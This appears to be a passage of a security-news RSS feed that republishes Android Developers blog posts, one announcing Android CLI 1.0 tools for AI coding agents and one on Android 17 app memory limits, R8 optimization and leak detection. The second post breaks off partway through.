<pubDate>Sat, 25 Jul 2026 10:15:49 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVLU7gkfsf4axphzvtOKcqEkI3MLKZqX6Y9jGVReW6Ximz61c8klVVc0_Xs5Fw_aqk5yjl3K-Mit6cyKq0SLOJbUhUZ7R3dZZcwShqn5jYp-DuHY8hNoBWHJkicoIJ9DKRINQt6seAB3s2mcwANFYX9k0scYyCgfIYQrof7ImxOvzEW7BNj0ZPwEGB5FI/s2048/GoogleForDevelopers-AndroidCombo3-StrapiMetacard-2048x1323%20(1).png">





<div><div class="separator"><i>Posted by Simona Milanovic and Ben Trengrove, Developer Relations Engineers</i><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-DNQCYynOZTPwB7Two8HSejPtcinJWir0-t4Wseo9MFHwLNeluQqIbf-9XDJXcSTaHBoX7NJ6oTFRUczPaokekC-oFEFgdZwxngaskLaxyqCGy5-ZbT0QAnmRafTvx3PKPaMo-npHZuwUAi84AW-28rWw6_2BTWHnXoXqbSrX6Kboz0fy5lz9YogDFf0/s4209/GoogleForDevelopers-AndroidCombo3-Blogger-4209x1253.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-DNQCYynOZTPwB7Two8HSejPtcinJWir0-t4Wseo9MFHwLNeluQqIbf-9XDJXcSTaHBoX7NJ6oTFRUczPaokekC-oFEFgdZwxngaskLaxyqCGy5-ZbT0QAnmRafTvx3PKPaMo-npHZuwUAi84AW-28rWw6_2BTWHnXoXqbSrX6Kboz0fy5lz9YogDFf0/s16000/GoogleForDevelopers-AndroidCombo3-Blogger-4209x1253.png"></a></div></div><div><br></div><div>
As Android developers, you have many choices when it comes to the agents, tools, command-line interfaces (CLI), and LLMs you use for app development. Whether you use Gemini in Android Studio,  Antigravity 2.0, Antigravity CLI, or third-party agents like Anthropic's Claude Code or OpenAI'sCodex, our mission remains the same: to ensure that high-quality Android development is possible everywhere.

  <p><span></span></p>
<p><span></span></p>
<div class="separator">
    <div>
        </div></div>
<p></p>

  <p>At <b>Google I/O ‘26</b>, we shared the latest leaps forward in agentic development, and showcased some of the newest capabilities of <a href="https://developer.android.com/tools/agents/android-cli">Android CLI</a>—now stable at version 1.0 and ready for all Android developers to use. From new skills to enabling agent access to powerful Android Studio capabilities, we’re giving your agents the right tools to build alongside you.</p>

  <div>If you’re already using Android CLI and want to jump into using all the new features, just run <span><code>android update<code></code></code></span>. Otherwise, read further to learn more about how we’re making the agents you choose be better at building for Android.</div>

  <h3>Android development unlocked for Antigravity</h3>
  <p><a href="https://antigravity.google/">Google Antigravity</a> now includes an optional bundle of Android resources—including the Android CLI and skills—that you can install. You can either install the bundle during onboarding after installation, or later from the <b>Settings &gt; Customizations &gt; Build With Google Plugins</b> menu.</p><p>This provides Antigravity with all the powerful tools and knowledge of Android CLI, enabling it to perform the core tasks necessary for Android app development more easily and efficiently—from creating projects to deploying your app on a new Android virtual device.</p><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivI2fhgZRJRpz8TXcX4OC2CALzgOfHhKyVmVG0IaMsibqaAUVbZORx-5fbVrYUKlp0Fl1qk1wZ02jbrYSfFGRCtOvnOzWWYdw8G3or9ul_QY2yvT6Wm-kEIjAJtfj75kNWlSswAqoUCLvSefnFY3JMw7NQOA8hkDn3nc232oyEK1VN5ZM_UHbAEJWolWE/s16000/agy-android-cli%20(1).png"></div><i><div><i>You can now easily install Android CLI for use with Google Antigravity 2.0.</i></div></i><h3>Unlocking Android Studio capabilities for any agent</h3><p>Android CLI provides a lightweight interface for AI Agents to perform tasks and retrieve knowledge about Android development. However, there's benefits to specialization — Android Studio contains over a decade of Android expertise, built to handle even the most complex Android projects. This includes Android Studio's powerful static analysis engine, refactoring tools, dependency management, UI design and rendering libraries, and more. AI Agents can now tap into Android Studio's tools to gain many of these same capabilities.</p><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRp6RfqiD9adFdIQS9Fm_a3p_5X6K5Fjo5rEQhOeOqFpvjlQ-04DHav5atkLF7IZvnpdMaQqG_oBAhmcvCPRtAvsW7AH0Q3VF18y-TBUITLXBglNbR2o99sC-hJgj_D-OhF51rLO_OYi1RXdm6GBfgZqfsTdQa1CY6_g10D2LwLun3S1CjfqOY2pqp02Y/s16000/agy-android-studio%20(1).png"></div><div><i>Your agents can now use Android CLI to access powerful capabilities of Android Studio.</i></div><p>The latest version of Android CLI introduces the new <code>android studio</code> command. This enables the agent of your choice to leverage the deep, contextual capabilities of Android Studio to better understand and perform actions on an open Android project. By running Android Studio alongside your preferred agent with Android CLI, your agent’s tasks can more efficiently navigate the codebase to produce more precise code changes. And, when you use Android CLI to create and iterate on your project, transitioning to Android Studio is much easier, so that you can use the purpose built tools—such as, performance profilers, Compose Previews, and Android Device Streaming—to get that production-grade polish.</p>

  <p>When you have a project open in the latest <a href="https://developer.android.com/studio/preview">preview version</a> of Android Studio Quail, you (or your agent) can run the following command to check whether Android CLI has a connection established with your open project:</p>

<pre><span><p dir="ltr"><span>$ android studio check</span></p><p dir="ltr"><span>pid: </span><span>32942</span></p><p dir="ltr"><span>version: </span><span>Android Studio</span></p><p dir="ltr"><span>Projects:</span></p><span>    </span><span>READY</span><span>     JetSet /Users/adarshf/AndroidStudioProjects/jetset-main</span></span></pre>

  <p>From there, the agents can use the <code>android studio</code> command to access powerful IDE tools to interact with projects more efficiently. Key commands include:</p><p></p><ul><li><b>analyze-file:</b> Analyzes a file for errors and warnings using the editor's built-in inspections.</li><li><b>find-declaration:</b> Finds the exact definition site of a symbol (class, method, variable, field, constant, or Android resource/color) across the project using semantic resolution.</li><li><b>find-usages: </b>Finds all references and declarations of a symbol (class, method, variable, or Android resource) across the entire project using semantic analysis.</li><li><b>render-compose-preview: </b>Renders a Jetpack Compose UI Preview and returns a path to the image and UI hierarchy if successful.</li><li><b>version-lookup:</b> Get the latest information about which versions for specified app dependencies are available in common repositories, such as the Google Maven repository. By providing a programmatic solution, dependency management is less tedious and much less prone to flakiness.</li><li><b>open-file: </b>Opens a file directly in Android Studio. This is useful if the agent wants to direct your attention to view Compose Previews, performance traces, or other specific files in the IDE.</li></ul><p></p><ul>
  </ul>

  <p>For example, agents can now run the following commands to render a Compose preview for a new layout for your Android app, and then open the previews in Android Studio for you to take advantage of seeing multiple Compose Previews side by side and make AI-assisted edits right from the IDE.</p>

<pre><span><p dir="ltr"><span>$ android studio </span><span>find-declaration</span><span> HotelDetailScreen</span></p><p dir="ltr"><span>$ android studio </span><span>analyze-file</span><span> .../JetPacker/feature/detail/src/main/java/com/example/jetset/feature/detail/HotelDetailScreen.kt</span></p><span>$ android studio </span><span>open-file</span><span> feature/detail/src/main/java/com/example/jetset/feature/detail/HotelDetailScreen.kt</span></span></pre>

  <p>To learn more about how to use these commands, run <code>android help</code>. And, to make sure your agents understand how to work with this tool, make sure to update the Android CLI skill by running <code>android init</code>.</p>

  <h3>More ways to get started</h3>
  <p>To make integrating Android CLI into your environments as seamless as possible, we’re making it available in more ways. You can now download and install Android CLI using more package managers: apt-get, winget, and homebrew. For example, you can run the following to install Android CLI using winget:</p>

  <pre>winget install -e --id Google.AndroidCLI</pre>

  <p>We’ve also updated the installation to a user-local directory, by default. You can find the commands for all supported operating systems plus additional download options on the <a href="https://developer.android.com/tools/agents/android-cli/archive">Android CLI page</a>.</p>

  <h3>Support for Journeys</h3>
  <div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip7lO5BVjTIeJXDWyrGOdl4KpPTo8_oEcf0qLFUBRfPgOazlG7C9eLWDLdnNYb68-rlon4uOE4qo62WC_U7SaAOYwLG3Vbr0v_lRsh-iNoPzVMmFbAgKXXN1hz9Qj7rMImyybqHCU34ryMlml2fCquAyfNgp1yWiZu-CsP1Jowx4o0z69_wkNtYR0GQIM/s16000/android-cli-write-journey.png"></div><div><i>Journeys are natural language descriptions of core user experiences.</i></div><div><span><span><br></span></span></div>We are also introducing support for <a href="https://developer.android.com/tools/agents/android-cli/journeys">Journeys</a>. With Journeys tools and skills included with Android CLI, any agent of your choice can now create and run Journeys—which are natural language descriptions of user journeys for your app that are saved directly to your project.</div><div> <div class="separator"><img border="0" data-original-height="576" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeAW4kjqfV1t_mAw_iYwgWSczw3q-h3VEOAuDAe12uBel0niX6M2KAoGrs6M2UHhT3t1GvBZs-c3w0R87W6HgCAzHQZOdFjixUHyYCZRzhOgB_RtOkVh0Ph8cDFki0sWI8i5CFNXxGxBHai0uh0RZw5E9kcJUvl8DJtPT3tnkaQm5r8UHuWMstopnTnnI/s16000/android-cli-journey-run.gif"></div><p><i>(sped up) An agent running a Journey it generated for an app.</i></p>Agents can run these journeys using the Android CLI to navigate your app exactly like a user would. This unlocks entirely new ways to test, validate, or collect data across the critical experiences of your app, all driven by natural language and executed by your agent.
  
  <h3>Expanding Android skills</h3>
  <p>To help models better understand and execute specific patterns that follow our best practices, we are continuing to expand our <a href="https://github.com/android/skills">library of Android skills</a>. We’re shipping new skills that make Android development everywhere more capable, efficient, and productive:</p><p></p><ul><li><b>Display Glasses and Jetpack Compose Glimmer for XR: </b>Provides guidelines for developing projected applications for Android Display Glasses using the Jetpack Compose Glimmer UI toolkit.</li><li><b>Migration to CameraX:</b> Helps you migrate legacy Android camera implementations (Camera1 or raw Camera2 APIs) to CameraX.</li><li><b>Perfetto SQL:</b> Translates natural language data prompts into Perfetto SQL queries and executes them against a local trace file.</li><li><b>Adaptive UI:</b> Instructions to make or update an app's UI so that it adapts to different Android devices</li><li><b>Testing setup: </b>Creates a basic testing strategy.</li><li><b>Styles:</b> Helps with adoption of the new Jetpack Compose Style API for new components, and supports migration to Styles API. </li><li><b>AppFunctions: </b>Analyzes Android codebases to recommend and implement new AppFunctions, and refines KDoc documentation for Model Context Protocol optimization.</li></ul><p></p><p>You can add these new skills to your workflow directly from the command line. To help your agents understand and use Android CLI right away, you can initialize your environment and install the base android-cli skill by running:</p>
<pre>android init
</pre>
  <p>From there, you can browse and set up your agent workflow by searching for the exact capabilities your agent needs:</p>
<pre>android skills list
</pre>
  <p>Once you've found the right skill, install it to your environment by running:</p>
<pre>android skills add –skill=&lt;skill-name&gt;
</pre>
  
  <h3>Get started today</h3>
  <p>To download the stable 1.0 release of the Android CLI, explore the new tools, and browse the complete documentation, head over to <a href="https://d.android.com/tools/agents">d.android.com/tools/agents</a> today!  Also, make sure you update to the <a href="https://developer.android.com/studio/preview">latest preview version of Android Studio</a> to unlock the latest features that Android CLI offers. We can't wait to see what you build with Android CLI 1.0 and how these new features supercharge your daily workflows. Join our vibrant community on <a href="https://www.linkedin.com/showcase/androiddev/posts/?feedView=all">LinkedIn</a>, <a href="https://medium.com/androiddevelopers">Medium</a>, <a href="https://www.youtube.com/c/AndroidDevelopers/videos">YouTube</a>, or <a href="https://twitter.com/androidstudio">X</a> and  share your feedback.</p><p>Explore this announcement and all Google I/O 2026 updates on <a href="https://io.google/2026/?utm_source=blogpost&amp;utm_medium=pr&amp;utm_campaign=devblogs&amp;utm_content=">io.google.</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Prioritizing Memory Efficiency: Essential Steps for Android 17]]></title>
<description><![CDATA[Posted by Alice Yuan, Developer Relations Engineer, Ajesh Pai, Developer Relations Engineer, and Fung Lam, Developer Relations Engineer



    
        
    



    While app performance is often equated with a smooth UI and fast start times, memory serves as the silent foundation upon which thes...]]></description>
<link>https://tsecurity.de/de/3693508/android-tipps/prioritizing-memory-efficiency-essential-steps-for-android-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693508/android-tipps/prioritizing-memory-efficiency-essential-steps-for-android-17/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:41 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCIAoJpwUITPS5C3_eTksMsaslwqPk7SIEQHkwEkGv8572ccdIKcdv6kNC1BOSJPAZTgX5m3liMMv4zdK58e5dWRhUfo39uas23LuhEWf13TFnDTdw-Z5mWn4JarSnC8yCET8Sw15zSF-jQ5zwALriacGK6IjAGxNg61sFtSxzndjvqXxZtJt4qxuzd9A/s2048/Engineering-Memory-Blog-Meta-3.png">

<div class="separator">
    <em>Posted by Alice Yuan, Developer Relations Engineer, Ajesh Pai, Developer Relations Engineer, and Fung Lam, Developer Relations Engineer</em>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanYZz4QpaDuwP7y_ZVGCUh6TpdQxS65pBcYr-Qkawd9YFS587tnIUPnqDROlxIXzgdz6GGxluR3LzH8ZabQPWz382FDEOEDpK3GxUFywn0A54JXFtUwDPaeI0JnFhEl-6NRrcjKeFPMLozNQv_An9OcWEUA-rmXfOhWvIKRrptdblGEZHERD0P-ynFcc/s4209/Engineering-Memory-Blog-3.png">
        <img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanYZz4QpaDuwP7y_ZVGCUh6TpdQxS65pBcYr-Qkawd9YFS587tnIUPnqDROlxIXzgdz6GGxluR3LzH8ZabQPWz382FDEOEDpK3GxUFywn0A54JXFtUwDPaeI0JnFhEl-6NRrcjKeFPMLozNQv_An9OcWEUA-rmXfOhWvIKRrptdblGEZHERD0P-ynFcc/s16000/Engineering-Memory-Blog-3.png">
    </a>
</div>

<p>
    While app performance is often equated with a smooth UI and fast start times, memory serves as the silent foundation upon which these visible metrics are built. It's no secret that we're seeing a shift where device memory is more important than ever. Not only have we made strides in Android memory optimizations with Android 17, we're providing the tooling and API support to help you stay ahead of stricter memory requirements later this year.
</p>

<p>
    To ensure device stability, starting in Android 17, the system will begin enforcing app memory limits based on the device's total RAM. If an app exceeds those limits, Android will kill the process with no associated stack trace.
</p>

<div>
    Beyond these forced terminations, unoptimized memory usage inevitably degrades the user experience. When the app approaches heap memory limits, it triggers frequent garbage collection—leading to noticeable UI stutters. Furthermore, when a device runs out of available memory, the system scrambles to reclaim pages, causing CPU strain, UI latency, and battery drain. If the memory shortage is too severe, it can cause Low Memory Killer (LMK) events that abruptly terminate background processes and force apps to have slow cold starts and lose user state.
</div>

<div>
    <p>To build highly performant apps and avoid these forced terminations, we recommend that you adopt the following memory optimization strategies:</p>
    <ol>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Maximize">Maximize bytecode optimization with R8</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Optimize">Optimize image loading</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Detect">Detect and fix memory leaks with Android Studio</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Trim">Trim memory when app leaves visible state</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Advanced">Advanced memory observability with ProfilingManager</a></li>
    </ol>
</div>
<br>
<div>
    <div class="separator">
        
    </div>
    <div>
        <em>A condensed version of this blog post is also available in video format, go check it out!</em>
    </div>
    
    <h3>Understanding Android 17 app memory limits</h3>
    <p>App memory limits are being introduced in Android 17 to prevent "one bad actor" from destroying the multitasking experience and stability of the user’s entire device.</p>
    <p>Here is a breakdown of the reasons driving this architectural change:</p>
    
    <div>
        <ul>
            <li><b>Preventing cascading kills:</b> When an app becomes bloated or leaks memory while holding a privileged state (e.g. it’s running a Foreground Service), it is initially shielded from the system's Low Memory Killer (LMK). As this single app grows unchecked and hoards RAM, the LMK is forced to compensate by killing off dozens of smaller, well-behaved cached apps and background jobs to reclaim space for the memory hog.</li>
            <li><b>Preserving multitasking and user state:</b> When the system is forced to purge cached apps to accommodate a single leaking process, the multitasking experience is severely degraded. Users returning to prior cached applications encounter sluggish cold starts instead of near-instant warm resumes. This inefficiency generates more CPU strain and accelerates battery depletion. It can also destroy the user’s context in recently used apps, such as scroll positions, navigation stacks, and in-game progress.</li>
        </ul>
        
        <div>
            <p>To determine if your app session was impacted by these constraints in the field, you can call <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo#getDescription%28%29" target="_blank">getDescription()</a> within <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo" target="_blank">ApplicationExitInfo</a>. If the system applied a limit, the exit reason is reported as <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo#REASON_OTHER" target="_blank">REASON_OTHER</a> and the description string will contain "MemoryLimiter:AnonSwap". You can also leverage <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/trigger-based-capture" target="_blank">trigger-based profiling</a> using <a href="https://developer.android.com/about/versions/17/features#anomaly-profiling-trigger" target="_blank">TRIGGER_TYPE_ANOMALY</a> to automatically capture heap dumps when the memory limit is reached. Furthermore, Android is actively working to surface more in-field memory metrics to developers within the Google Play Console.</p>
            <p>We have also expanded our <a href="https://developer.android.com/about/versions/17/behavior-changes-all#app-memory-limits" target="_blank">memory limits documentation</a> to include local debugging commands, allowing you to simulate memory constraints in your local environment and validate your application's behavior under any memory limit enforcement. </p>
        </div>
    </div>
</div>

<div>
    <h3>Maximize bytecode optimization with R8</h3>
    <p>A highly effective way to reduce your app's memory footprint is to enable the R8 optimizer. By shrinking classes, methods, and fields into shorter names and stripping out unused code and resources, R8 significantly reduces your app's memory footprint by minimizing the amount of resident code required during execution. </p>
    <p>R8 minimizes resident code, shrinking the memory footprint and lowering LMK termination risk. This results in more frequent warm starts over slow cold starts. Additionally, streamlined bytecode reduces main-thread CPU overhead, directly cutting ANR rates for a more fluid user experience. For example, the digital bank <a href="https://developer.android.com/blog/posts/monzo-boosts-performance-metrics-by-up-to-35-with-a-simple-r8-update" target="_blank">Monzo</a> enabled full R8 optimization and saw a 35% reduction in their ANR rate, a 30% improvement in cold start rate, and a 9% reduction in overall app size.</p>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB61hi7-o6RYAHNOoIg1egyi6iU3iGtLbwfOb-s6r_PadBV2LZzvYtcdD00iwcApjnqmwOssOLFSHv8MG_es8WJWaJUPaO6rMY4ZcINSBFROo_1Di3LVMvIEhPldpzQsUOxV1Z7VfPwvej2fa9a7yCNwBdGOGw2LMLtPrCST6InlqF1xHds30rS76C9no/s2500/pic1-IO26_113_TSV-monzo-casestudy.jpg">
        <img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB61hi7-o6RYAHNOoIg1egyi6iU3iGtLbwfOb-s6r_PadBV2LZzvYtcdD00iwcApjnqmwOssOLFSHv8MG_es8WJWaJUPaO6rMY4ZcINSBFROo_1Di3LVMvIEhPldpzQsUOxV1Z7VfPwvej2fa9a7yCNwBdGOGw2LMLtPrCST6InlqF1xHds30rS76C9no/s16000/pic1-IO26_113_TSV-monzo-casestudy.jpg">
    </a>
</div>
<div>
    <i>The digital bank <a href="https://developer.android.com/blog/posts/monzo-boosts-performance-metrics-by-up-to-35-with-a-simple-r8-update" target="_blank">Monzo</a> enabled full R8 optimization and boosted performance metrics by up to 35%.</i>
</div>

<div>
    <p>To properly configure R8 in your <code>build.gradle</code> file:</p>
    <ul>
        <li>Set <code>isShrinkResources = true</code> and <code>isMinifyEnabled = true</code>.</li>
        <li>Use <code>proguard-android-optimize.txt</code> instead of the legacy <code>proguard-android.txt</code>, which actually prevents optimizations and is no longer supported in Android Gradle Plugin 9.</li>
        <li>Remove <code>android.enableR8.fullMode = false</code> from your <code>gradle.properties</code>.</li>
    </ul>
    
    <p>
        If you are using reflection in your code base, then add <a href="https://developer.android.com/topic/performance/app-optimization/keep-rules-overview#where-to-add-rules" target="_blank">Keep rules</a> to prevent R8 from optimizing those parts of the code. Make sure to scope the keep rules narrowly to get the maximum optimization.
    </p>
    <p>To get the maximum optimization, make sure to follow these best practices in your keep rule file.</p>
    
    <ul>
        <li>Remove global options like <code>-dontoptimize</code>, <code>-dontshrink</code>, and <code>-dontobfuscate</code> that prevent R8 from optimizing the entire codebase </li>
        <li>Remove keep rules that prevent optimizing Android components like Activity, Services, Views or Broadcast receivers.</li>
        <li>Refine the broad package wide keep rules to target only specific classes or methods.</li>
    </ul>
    
    <p>To see more best practices, view our <a href="https://developer.android.com/topic/performance/app-optimization/keep-rules-best-practices" target="_blank">keep rules documentation</a>.</p>
    
    <h3>Library Developer R8 Best Practices</h3>
    <p>If you are a library developer, strictly place the rules your consumers need into your <code>consumer-rules</code> file, and keep your library's internal protection rules in your <code>proguard-rules.pro</code> file. For more information on how to optimize libraries, see <a href="https://developer.android.com/topic/performance/app-optimization/library-optimization" target="_blank">Optimization for library authors</a>.</p>
    
    <h3>R8 Configuration Analyzer</h3>
    <p>To audit your R8 optimization, use the <b><a href="http://developer.android.com/r8-analyzer" target="_blank">Configuration Analyzer</a></b>. Configuration analyzer shows the current state of optimization with Obfuscation, Optimization, and Shrinking scores. With configuration analyzer, you can also understand how many classes, methods or fields are prevented from optimization by each keep rule. Refine these broad package wide keep rules to unlock the maximum optimization.</p>
    <p>Using configuration analyzer, you can also identify keep rules that are subsuming other keep rules, redundant keep rules and unused keep rules.</p>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib0dTmk8w7EYsDiV0Ufd8CAnpWz36-ZDC_gCGFkS_0CGz0axCxOy3RBxuaOoUbR4kzaeFBXryfSR2rkxRsmTXNrPtuJw8n1DTiZiKDqHjv3AaEXteE9TKV3QxYtwCztvY-8a0GpBlOZhVV1p0ftgdxeiKGGnO3dLu_IOt-TB_7j-ZnbR2jSr_CNYzh-bc/s2048/pic2-r8-config-analyzer.png">
        <img border="0" data-original-height="1156" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib0dTmk8w7EYsDiV0Ufd8CAnpWz36-ZDC_gCGFkS_0CGz0axCxOy3RBxuaOoUbR4kzaeFBXryfSR2rkxRsmTXNrPtuJw8n1DTiZiKDqHjv3AaEXteE9TKV3QxYtwCztvY-8a0GpBlOZhVV1p0ftgdxeiKGGnO3dLu_IOt-TB_7j-ZnbR2jSr_CNYzh-bc/s16000/pic2-r8-config-analyzer.png">
    </a>
</div>
<div>
    <i>The Configuration Analyzer shows the current state of optimization with Obfuscation, Optimization, and Shrinking scores.</i>
</div>

<div>
    <h4><span>R8 Agent Skill </span></h4>
    <p>You can also leverage the <b><a href="https://github.com/android/skills/tree/main/performance/r8-analyzer" target="_blank">R8 Agent Skill</a></b> with Android Studio agent or other AI tools to resolve misconfigurations and refine your rules resulting in improved app performance. <i>(Insights from AI-driven skills will require technical verification)</i></p>
</div>

<h3>Optimize image loading</h3>
<div>
    <p>Bitmaps are usually the largest common objects residing in your app's memory. They represent the final stage of the image loading process where compressed files, like JPEGs or PNGs, are decoded into raw pixel data for display. This means a tiny 100KB compressed image can balloon into several megabytes of RAM because memory consumption is determined by the image's pixel dimensions and color depth. Since bitmap operations are frequently on the critical path to drawing frames, unoptimized images cause severe memory bloat and UI jank.</p>
    <p>Google recommends leveraging image loading libraries <b><a href="https://github.com/coil-kt/coil" target="_blank">Coil</a></b> for Kotlin-first projects, particularly when developing with Jetpack Compose and <b><a href="https://github.com/bumptech/glide" target="_blank">Glide</a></b> for Java-based applications.</p>
    
    <h4><span>Adopt these five best practices</span></h4>
    <ol>
        <li><b>Downsample images:</b> If you’re loading bitmaps manually, avoid loading a massive image into a tiny thumbnail view; use <a href="https://developer.android.com/topic/performance/graphics/load-bitmap" target="_blank">inSampleSize</a> to load a smaller version. Glide and Coil downsamples images by default and you can configure this downsample strategy using <a href="https://bumptech.github.io/glide/javadocs/470/com/bumptech/glide/load/resource/bitmap/DownsampleStrategy.html" target="_blank">DownsampleStrategy</a> and <a href="https://coil-kt.github.io/coil/image_loaders/" target="_blank">ImageLoader</a> respectively.</li>
        <li><b>Cropping:</b> Avoid embedding padding directly into an image file for letterboxing purposes (e.g., creating a transparent border to expand an image dimensions). Rather than baking in these borders, utilize <a href="https://developer.android.com/reference/android/graphics/drawable/InsetDrawable" target="_blank">InsetDrawable</a> or apply padding directly within the View or Composable containing the bitmap.</li>
        <li><b>Config:</b> Balance memory and quality by choosing the right pixel format. Use <code>RGB_565</code> when transparency isn't needed, which uses half the memory of the default <code>ARGB_8888</code> format. In Glide you can configure this by using <a href="https://bumptech.github.io/glide/javadocs/470/com/bumptech/glide/load/DecodeFormat.html" target="_blank">DecodeFormat</a> and in Coil you can use <a href="https://coil-kt.github.io/coil/api/coil-core/coil3.request/-image-request/" target="_blank">bitmapConfig</a> property.</li>
        <li><b>Prioritize vector drawables:</b> For basic geometric assets, leverage <a href="https://developer.android.com/reference/android/graphics/drawable/ShapeDrawable" target="_blank">ShapeDrawable</a> as a lightweight alternative to decoding rasterized bitmaps. By defining these assets once via XML, you ensure they scale seamlessly across all display densities while effectively eliminating resource-driven memory bloat.</li>
        <li><b>Reuse:</b> If your application manages Bitmaps manually then to minimize memory churn, when a bitmap is no longer required, the app should call <code>bitmap.recycle()</code> and immediately discard the Bitmap reference. If you use an image loading library like Glide or Coil, return the bitmap to the library’s managed pool. By providing an existing buffer for future memory needs, the pool effectively avoids the overhead of new allocations.</li>
    </ol>
    
    <p>Check out our documentation on <a href="https://developer.android.com/develop/ui/compose/graphics/images/optimization" target="_blank">Optimizing performance for images</a> to learn more.</p>
    
    <h4><span>Android Studio tooling</span></h4>
    <p>You can also eliminate redundant bitmaps using Android Studio Narwhal 4. Here is how to hunt them down in five simple steps:</p>
    <ol>
        <li>Open the <b>Profiler</b> tab in Android Studio</li>
        <li>Click <b>Heap Dump</b> (or "Analyze Memory Usage") and hit record to take a snapshot of your app’s current memory state.</li>
        <li>Scan the analysis results for the <b>yellow warning triangle</b> ⚠️, which Android Studio uses to flag duplicate bitmaps being stored multiple times. Alternatively, navigate to the profiler header, choose "Filter by:" and pick the "Duplicate Bitmaps" setting.</li>
        <li>Click on any flagged entry to open the <b>Bitmap Preview</b> pane, allowing you to see exactly which image is the repeat offender.</li>
        <li>Use that visual confirmation to track down the redundant loading logic in your code and implement a better caching strategy.</li>
    </ol>
</div>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDJ6djtozFY7DzrGB-EN8ajLVueF9MdLd4mod4jhtO8YwCzU7ObOwQ2w0Bap5A5NHJ7KVnXIRQqhW8cTdcFhMJPw5FIW1WU7D_Mwm-UC9Fsdr-MOn62xijpjKcS0NeUBnO957jmogGEISNQgeZQk3BVvUWK4BknTjLiuK2TbWCqwO3uTLkjkFhLwJre7w/s2379/pic3-IO26_113_TSV%20-dup-bitmaps-cropped.jpg"><img border="0" data-original-height="1162" data-original-width="2379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDJ6djtozFY7DzrGB-EN8ajLVueF9MdLd4mod4jhtO8YwCzU7ObOwQ2w0Bap5A5NHJ7KVnXIRQqhW8cTdcFhMJPw5FIW1WU7D_Mwm-UC9Fsdr-MOn62xijpjKcS0NeUBnO957jmogGEISNQgeZQk3BVvUWK4BknTjLiuK2TbWCqwO3uTLkjkFhLwJre7w/s16000/pic3-IO26_113_TSV%20-dup-bitmaps-cropped.jpg"></a></div><div class="separator"><i>Look for the yellow warning triangle ⚠️ in heap dumps when using the Android Studio Profiler.</i></div>

<h3>Detect and fix memory leaks with Android Studio</h3>
<p>Memory leaks in Android occur when your code holds onto an object's reference long after its lifecycle has ended. This prevents the Garbage Collector (GC) from reclaiming that memory, eventually leading to sluggish performance or OutOfMemoryError (OOM).</p>
<p>Android Studio Panda 3 features a dedicated <a href="https://square.github.io/leakcanary/" target="_blank">LeakCanary</a> profiler task, allowing developers to analyze real-time memory leaks and map traces within the IDE.</p>
<p>The LeakCanary profiler task in Android Studio actively moves the memory leak analysis from your device to your development machine, resulting in a significant performance boost during the leak analysis phase as compared to on-device leak analysis.</p>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBixtkwy1hzwA6mikjRX_6vBJ9OQ_RCYdF94HUF8kOLYzQoQrPMLh_6h9u6EGeLzgFc8yjxg3_8zlqWIDCvKa1py5gyxDXasl8JLPDHSEgPpzPyYqzcme69rRKtfIlhMtyNRWXutGXNy-4WcefhSTBhqBgobK678fqvNqL5peOz1UD6ouunLaKPmJCw0/s2048/pic4-android-studio-leaks.png">
        <img border="0" data-original-height="975" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBixtkwy1hzwA6mikjRX_6vBJ9OQ_RCYdF94HUF8kOLYzQoQrPMLh_6h9u6EGeLzgFc8yjxg3_8zlqWIDCvKa1py5gyxDXasl8JLPDHSEgPpzPyYqzcme69rRKtfIlhMtyNRWXutGXNy-4WcefhSTBhqBgobK678fqvNqL5peOz1UD6ouunLaKPmJCw0/s16000/pic4-android-studio-leaks.png">
    </a>
</div>
<div>
    <i>LeakCanary memory leak analysis contextualized with <b>Go to declaration</b> for debugging</i>
</div>

